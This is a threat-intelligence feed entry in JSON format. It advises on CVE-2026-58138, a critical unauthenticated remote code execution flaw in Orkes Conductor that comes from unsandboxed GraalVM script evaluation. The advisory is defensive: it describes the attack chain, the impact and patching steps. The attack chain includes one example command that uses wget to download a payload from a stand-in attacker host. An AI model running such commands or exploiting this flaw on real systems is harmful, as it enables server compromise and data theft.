{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","favicon":"https://feed.craftedsignal.io/favicon-32x32.png","feed_url":"https://feed.craftedsignal.io/products/conductor-3.21.21--3.30.2/feed.json","home_page_url":"https://feed.craftedsignal.io/","icon":"https://feed.craftedsignal.io/apple-touch-icon.png","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["Conductor 3.21.21 (\u003c 3.30.2)","Conductor 3.30.1","Conductor (\u003c 3.30.2)"],"_cs_severities":["critical"],"_cs_tags":["RCE","vulnerability","Java","Conductor","web-application"],"_cs_type":"advisory","_cs_vendors":["Orkes"],"content_html":"\u003cp\u003eA critical unauthenticated remote code execution vulnerability, tracked as CVE-2026-58138, affects Orkes Conductor versions 3.21.21 before 3.30.2. This flaw enables remote attackers to execute arbitrary operating system commands on the underlying server without prior authentication. The vulnerability stems from the ability to submit inline workflow definitions containing malicious JavaScript or Python expressions directly to the workflow API endpoint. Attackers can exploit unsandboxed GraalVM evaluators, configured with \u003ccode\u003eHostAccess.ALL\u003c/code\u003e or \u003ccode\u003eallowAllAccess(true)\u003c/code\u003e, through \u003ccode\u003eINLINE\u003c/code\u003e, \u003ccode\u003eLAMBDA\u003c/code\u003e, \u003ccode\u003eDO_WHILE\u003c/code\u003e, and \u003ccode\u003eSWITCH\u003c/code\u003e task types. This allows for the invocation of arbitrary system commands via Java reflection or direct subprocess calls, posing a severe risk of complete system compromise and data exfiltration.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies an internet-exposed Orkes Conductor instance running a vulnerable version (e.g., 3.21.21 up to 3.30.1).\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a specialized workflow definition payload containing embedded malicious JavaScript or Python expressions.\u003c/li\u003e\n\u003cli\u003eThese expressions are designed to leverage Java reflection or direct subprocess calls to execute arbitrary OS commands (e.g., \u003ccode\u003ebash -c 'wget evil.com/payload.sh'\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe crafted workflow definition is submitted to the unauthenticated workflow API endpoint of the vulnerable Orkes Conductor instance.\u003c/li\u003e\n\u003cli\u003eOrkes Conductor processes the submitted inline workflow, and the unsandboxed GraalVM evaluator begins to parse and execute the malicious expressions.\u003c/li\u003e\n\u003cli\u003eThe GraalVM evaluator, configured with permissive access settings like \u003ccode\u003eHostAccess.ALL\u003c/code\u003e, executes the attacker's embedded code.\u003c/li\u003e\n\u003cli\u003eThe malicious code successfully executes arbitrary OS commands on the host system, achieving unauthenticated remote code execution.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe successful exploitation of CVE-2026-58138 allows unauthenticated attackers to achieve full remote code execution on the server hosting Orkes Conductor. With a CVSS v3.1 Base Score of 9.8 (Critical), this vulnerability can lead to complete system compromise, including sensitive data exfiltration, installation of backdoors, lateral movement within the network, and deployment of ransomware. Organizations utilizing vulnerable versions of Orkes Conductor face an immediate and severe risk if their instances are publicly accessible.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePatch CVE-2026-58138 immediately by upgrading Orkes Conductor to version 3.30.2 or later.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to restrict direct internet exposure of Orkes Conductor instances.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to detect suspicious process execution originating from the Conductor application.\u003c/li\u003e\n\u003cli\u003eMonitor for unusual outbound network connections from the Conductor server, indicative of command and control or data exfiltration activities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-09-18T09:27:05Z","date_published":"2026-06-30T19:20:22Z","id":"https://feed.craftedsignal.io/briefs/2026-06-orkes-conductor-rce/","summary":"An unauthenticated remote code execution vulnerability (CVE-2026-58138) in Orkes Conductor allows attackers to execute arbitrary OS commands by submitting malicious JavaScript or Python expressions within inline workflow definitions to the workflow API endpoint before authentication, leveraging unsandboxed GraalVM evaluators through specific task types to invoke system commands via Java reflection or direct subprocess calls.","title":"CVE-2026-58138: Unauthenticated Remote Code Execution in Orkes Conductor","url":"https://feed.craftedsignal.io/briefs/2026-06-orkes-conductor-rce/"}],"language":"en","title":"CraftedSignal Threat Feed - Conductor 3.21.21 (\u003c 3.30.2)","version":"https://jsonfeed.org/version/1.1"}